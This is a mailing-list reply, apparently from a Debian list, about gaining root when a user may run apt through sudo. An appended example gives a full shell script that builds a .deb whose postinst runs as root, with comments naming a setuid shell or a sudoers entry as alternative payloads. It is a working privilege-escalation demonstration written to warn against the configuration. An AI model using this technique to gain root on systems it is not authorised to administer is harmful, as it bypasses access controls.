❦ 12 August 2021 10:39 +05, Andrey Rahmatullin:
> I just ran across this article:
> https://blog.ikuamike.io/posts/2021/package_managers_privesc/
> I tested the attacks on Debian 11 and they work successfully, giving me
> a root shell prompt.
I don't think calling this "privilege escalation" or "attack" is correct.
The premise of the post is "the user should not be a root/admin user but
has been assigned sudo permissions to run the package manager" and one
doesn't really need a long article to prove that it's not secure.
I think the article is interesting nonetheless. Some people may think
that granting sudo on apt is OK. In the past, I think "apt install
./something.deb" was not possible.
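As an added illustration of the point above (this is my own example, not code from the thread or from the linked article): a local .deb carries maintainer scripts that dpkg runs as root, so a sudoers rule such as `alice ALL=(root) /usr/bin/apt` lets `sudo apt install ./rootshell_0.1_all.deb` execute whatever the package's postinst contains with uid 0 (apt has accepted a path to a local .deb file since apt 1.1). The package name, file paths and maintainer address below are my own choices; the postinst only records its uid, but any other command placed there would run with the same privileges.

```shell
#!/bin/sh
# Added example, not part of the original thread: build a minimal .deb whose
# postinst runs as root when the package is installed via a sudo-permitted apt.
# Package name, paths and maintainer address are assumptions for this demo.
set -eu

# Create the package tree under $1: DEBIAN/control plus an executable postinst.
make_pkg_tree() {
    tree="$1"
    mkdir -p "$tree/DEBIAN"
    cat > "$tree/DEBIAN/control" <<'EOF'
Package: rootshell
Version: 0.1
Architecture: all
Maintainer: example <example@example.invalid>
Description: shows that maintainer scripts run as root
EOF
    # dpkg runs postinst as root at the "configure" step. This one only records
    # the uid it runs under; anything else placed here (dropping a setuid shell,
    # adding a sudoers entry) would run with the same privileges.
    cat > "$tree/DEBIAN/postinst" <<'EOF'
#!/bin/sh
set -e
id -u > /tmp/rootshell.uid
EOF
    chmod 0755 "$tree/DEBIAN/postinst"
}

# Wrap the tree from $1 into the .deb named by $2. File ownership inside the
# archive does not matter for this demonstration, so no fakeroot is needed.
build_pkg() {
    dpkg-deb --build "$1" "$2"
}

# Print the uid recorded by postinst after installation (0 means the script
# ran as root), or a marker if the package has not been installed yet.
recorded_uid() {
    cat /tmp/rootshell.uid 2>/dev/null || echo "not installed"
}

workdir=$(mktemp -d)
make_pkg_tree "$workdir/rootshell"
if command -v dpkg-deb >/dev/null 2>&1; then
    build_pkg "$workdir/rootshell" "$workdir/rootshell_0.1_all.deb"
    echo "built $workdir/rootshell_0.1_all.deb"
    echo "install with: sudo apt install $workdir/rootshell_0.1_all.deb"
    echo "then check:   cat /tmp/rootshell.uid   (0 means postinst ran as root)"
else
    echo "dpkg-deb not found; package tree left in $workdir/rootshell"
fi
```

Run the script as the unprivileged user, then install the resulting package through the sudo rule; `recorded_uid` (or simply `cat /tmp/rootshell.uid`) shows 0, which is the whole argument for not granting sudo on apt to anyone who is not trusted with root.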